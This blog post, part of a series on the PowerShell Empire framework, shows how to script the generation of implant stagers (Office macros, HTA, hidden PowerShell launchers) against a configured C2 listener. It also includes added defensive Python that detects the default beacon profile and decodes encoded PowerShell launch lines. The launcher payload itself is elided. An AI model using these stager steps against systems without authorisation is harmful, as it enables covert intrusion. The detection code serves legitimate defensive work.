This post is part of the ‘Empire Series’ with some background and an ongoing list of series posts [kept here].
Recently, an Empire user requested that we build a ‘standalone payload generator’, similar to msfvenom’s functionality. The motivation is to provide a scriptable capability that makes integration with other tools relatively easy. This short post covers the newly integrated command-line options for Empire, which allow for the scripted generation of stagers.
To display the currently available options, run ./empire -h
# ./empire -h
usage: empire [-h] [--debug [DEBUG]] [-s [STAGER]]
[-o [STAGER_OPTIONS [STAGER_OPTIONS ...]]] [-l [LISTENER]] [-v]
optional arguments:
-h, --help show this help message and exit
--debug [DEBUG] Debug level for output (default of 1).
-s [STAGER], --stager [STAGER]
Specify a stager to generate. Lists all stagers if
none is specified.
-o [STAGER_OPTIONS [STAGER_OPTIONS ...]], --stager-options [STAGER_OPTIONS [STAGER_OPTIONS ...]]
Supply options to set for a stager in OPTION=VALUE
format. Lists options if nothing is specified.
-l [LISTENER], --listener [LISTENER]
Display listener options. Displays all listeners if
nothing is specified.
-v, --version Display current Empire version.
In order to effectively use Empire’s CLI, you need to have a listener already set up, since the listener’s configuration is read from the backend empire.db database. A running ./empire instance isn’t required to generate stagers (though one can be running at the same time), but ./empire does need to be executed from the same path as the Empire installation that holds the configured listeners.
In order to display the active listeners, use ./empire -l
# ./empire -l
[*] Active listeners:
ID Name Host Type Delay/Jitter KillDate Redirect Target
-- ---- ---- ------- ------------ -------- ---------------
1 test http://192.168.52.142:8080 native 5/0.0
To display the configuration for a particular listener, use ./empire -l <listener_name>
# ./empire -l test
Listener Options:
Name Required Value Description
---- -------- ------- -----------
KillDate False Date for the listener to exit (MM/dd/yyyy).
Name True test Listener name.
DefaultLostLimit True 60 Number of missed checkins before exiting
StagingKey True 2c103f2c4ed1e59c0b4e2e01821770fa Staging key for initial agent negotiation.
Type True native Listener type (native, pivot, hop).
ID True 1 Listener ID.
RedirectTarget False Listener target to redirect to for pivot/hop.
DefaultDelay True 5 Agent delay/reach back interval (in seconds).
WorkingHours False Hours for the agent to operate (09:00-17:00).
Host True http://192.168.52.139:8080 Hostname/IP for staging.
CertPath False Certificate path for https listeners.
DefaultJitter True 0.0 Jitter in agent reachback interval (0.0-1.0).
DefaultProfile True /admin/get.php,/news.asp,/login/process.jsp|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Default communication profile for the agent.
Port True 8080 Port for the listener.
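The DefaultProfile, DefaultDelay and DefaultJitter values in the listener display above are also what a defender sees on the wire: an agent on this listener requests /admin/get.php, /news.asp or /login/process.jsp with the IE11 user-agent string, every 5 seconds with no jitter. The following Python is an added example (not part of the original post or of Empire) that runs that check over a web-proxy log: it flags requests matching the default profile and reports whether the matching requests from one client to one host arrive at a fixed interval. The log format, the log lines and the threshold in fixed_interval are constructed for the example.

```python
"""Added example: detect requests matching the Empire default communication
profile (URIs and user-agent from the listener options) in a proxy log and
check whether they beacon at a fixed interval (DefaultDelay=5, DefaultJitter=0.0).
Log format and sample lines are constructed for this example."""
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Values taken from the listener's DefaultProfile shown on the page.
DEFAULT_PROFILE_URIS = {"/admin/get.php", "/news.asp", "/login/process.jsp"}
DEFAULT_PROFILE_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"

# Constructed log format: ISO timestamp, client IP, destination host:port, path, quoted user-agent.
LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')

# Constructed sample: 10.0.0.7 beacons every 5 s with the default profile;
# 10.0.0.9 hits /news.asp too, but with a normal browser user-agent.
SAMPLE_LOG = """\
2016-03-01T10:00:00 10.0.0.7 192.168.52.139:8080 /admin/get.php "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
2016-03-01T10:00:05 10.0.0.7 192.168.52.139:8080 /news.asp "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
2016-03-01T10:00:10 10.0.0.7 192.168.52.139:8080 /login/process.jsp "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
2016-03-01T10:00:15 10.0.0.7 192.168.52.139:8080 /admin/get.php "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
2016-03-01T10:00:03 10.0.0.9 www.example.com:80 /news.asp "Mozilla/5.0 (X11; Linux x86_64) Firefox/45.0"
2016-03-01T10:02:41 10.0.0.9 www.example.com:80 /index.html "Mozilla/5.0 (X11; Linux x86_64) Firefox/45.0"
"""


def parse_line(line):
    """Parse one constructed-format log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts, client, host, path, ua = m.groups()
    return {
        "ts": datetime.fromisoformat(ts),
        "client": client,
        "host": host,
        "path": path.split("?", 1)[0],  # ignore any query string
        "ua": ua,
    }


def profile_matches(rec):
    """True when both the URI and the user-agent match the default profile."""
    return rec["path"] in DEFAULT_PROFILE_URIS and rec["ua"] == DEFAULT_PROFILE_UA


def find_default_profile_beacons(log_text, min_hits=3):
    """Group profile-matching requests by (client, host) and measure the
    regularity of their inter-request gaps. A near-zero spread relative to
    the mean gap is what a zero-jitter 5-second delay looks like."""
    groups = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and profile_matches(rec):
            groups[(rec["client"], rec["host"])].append(rec["ts"])

    findings = []
    for (client, host), stamps in groups.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        spread = statistics.pstdev(gaps)
        findings.append({
            "client": client,
            "host": host,
            "hits": len(stamps),
            "mean_gap_s": mean,
            "gap_stdev_s": spread,
            # Constructed threshold: spread under 10% of the mean gap counts as fixed-interval.
            "fixed_interval": spread < 0.1 * max(mean, 1.0),
        })
    return findings


if __name__ == "__main__":
    for f in find_default_profile_beacons(SAMPLE_LOG):
        print(f)
```

The user-agent check matters as much as the URI list: /news.asp is a plausible path on a real site, and the second client in the sample shows why a URI-only match would be noisy. In practice an operator can change DefaultProfile, so this catches only listeners left on the default, which is exactly the case the listener display above documents.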
If you want to display the available Empire stagers, use ./empire -s
# ./empire -s
Stagers:
Name Description
---- -----------
ducky Generates a ducky script that runes a one-liner stage0 launcher for Empire.
hta Generates an HTA (HyperText Application) For Internet Explorer
launcher Generates a one-liner stage0 launcher for Empire.
macro Generates an office macro for Empire, compatible with office 97-2003, and 2007 file types.
launcher_bat Generates a self-deleting .bat launcher for Empire.
dll Generate a PowerPick Reflective DLL to inject with stager code.
launcher_vbs Generates a .vbs launcher for Empire.
stager Generates a (stage1) key-negotiation stager for Empire.
pth_wmis Generates a pth-wmis launcher for Empire.
war Generates a Deployable War file.
hop_php Generates a hop.php redirector for an Empire listener.
To see the configurable options for a given stager, use ./empire -s <stager_name>
# ./empire -s launcher
Name: Launcher
Description:
Generates a one-liner stage0 launcher for Empire.
Options:
Name Required Value Description
---- -------- ------- -----------
ProxyCreds False default Proxy credentials
([domain\]username:password) to use for
request (default, none, or other).
Base64 True True Switch. Base64 encode the output.
Listener True Listener to generate stager for.
OutFile False File to output launcher to, otherwise
displayed on the screen.
Proxy False default Proxy to use for request (default, none,
or other).
UserAgent False default User-agent string to use for the staging
request (default, none, or other).
And finally, to generate a given stager, pass its options with -o in OPTION1=VALUE1 OPTION2=VALUE2 format. Be sure to set every option marked Required in the stager's configuration display above.
# ./empire -s launcher -o Listener=test
powershell.exe -NoP -NonI -W Hidden -Enc <base64-encoded launcher, elided>
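The launcher emitted above has a recognisable shape in process-creation telemetry: powershell.exe invoked with -NoP, -NonI, -W Hidden and -Enc followed by a base64 blob. The following Python is an added example (not part of the original post or of Empire) that scans a list of command lines for that flag combination and decodes the -Enc argument so an analyst can read what was passed. It assumes what powershell.exe itself does with these arguments: parameter names may be abbreviated to an unambiguous prefix, -e and -ec also mean -EncodedCommand, and the encoded argument is base64 of UTF-16LE text. The sample command lines, and the encoded content in them, are constructed for the example.

```python
"""Added example: flag command lines shaped like the Empire launcher shown on
the page (powershell.exe -NoP -NonI -W Hidden -Enc <base64>) and decode the
-EncodedCommand argument. Sample events are constructed for this example."""
import base64

# powershell.exe parameters relevant here; tokens are matched by unambiguous prefix,
# which is how powershell.exe resolves -NoP, -NonI, -W and -Enc.
PS_PARAMS = ("noprofile", "noninteractive", "windowstyle", "encodedcommand",
             "executionpolicy", "nologo", "command", "file")

# The flag set that characterises the launcher on the page.
LAUNCHER_FLAGS = {"noprofile", "noninteractive", "windowstyle", "encodedcommand"}


def canonical_param(token):
    """Map a '-Xyz' token to its full powershell.exe parameter name, or None."""
    if not token.startswith("-") or len(token) < 2:
        return None
    stem = token[1:].lower()
    if stem in ("e", "ec"):          # powershell.exe accepts these for -EncodedCommand
        return "encodedcommand"
    hits = [p for p in PS_PARAMS if p.startswith(stem)]
    return hits[0] if len(hits) == 1 else None


def decode_encoded_command(b64):
    """-EncodedCommand carries base64 of UTF-16LE text; restore padding and decode."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    return raw.decode("utf-16-le")


def analyse_cmdline(cmdline):
    """Return a finding dict for a powershell.exe command line, or None for other images."""
    tokens = cmdline.split()
    if not tokens:
        return None
    image = tokens[0].strip('"').lower().rsplit("\\", 1)[-1]
    if not image.startswith("powershell"):
        return None

    seen = set()
    encoded = None
    for i in range(1, len(tokens)):
        name = canonical_param(tokens[i])
        if name:
            seen.add(name)
            if name == "encodedcommand" and i + 1 < len(tokens):
                encoded = tokens[i + 1]

    finding = {"cmdline": cmdline, "params": sorted(seen),
               "launcher_like": LAUNCHER_FLAGS <= seen, "decoded": None}
    if encoded is not None:
        try:
            finding["decoded"] = decode_encoded_command(encoded)
        except (ValueError, UnicodeDecodeError):
            finding["decoded"] = None  # not valid base64/UTF-16LE; keep the flag result
    return finding


def scan_process_events(cmdlines):
    """Return only the launcher-like findings from a list of command lines."""
    results = []
    for c in cmdlines:
        f = analyse_cmdline(c)
        if f and f["launcher_like"]:
            results.append(f)
    return results


# Constructed sample events. The encoded payload is a harmless Write-Host,
# encoded the same way powershell.exe expects (UTF-16LE, then base64).
SAMPLE_ENCODED = base64.b64encode(
    "Write-Host 'constructed sample'".encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    "powershell.exe -NoP -NonI -W Hidden -Enc " + SAMPLE_ENCODED,
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File C:\scripts\backup.ps1",
    "notepad.exe readme.txt",
]

if __name__ == "__main__":
    for f in scan_process_events(SAMPLE_EVENTS):
        print(f["params"], "->", f["decoded"])
```

Decoding the argument rather than alerting on its mere presence is the useful part: -EncodedCommand has legitimate uses in scheduled tasks and management tooling, so the decoded text (and the -NoP/-NonI/-W Hidden combination) is what lets an analyst separate a staging one-liner from an administrator's script.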
Have fun!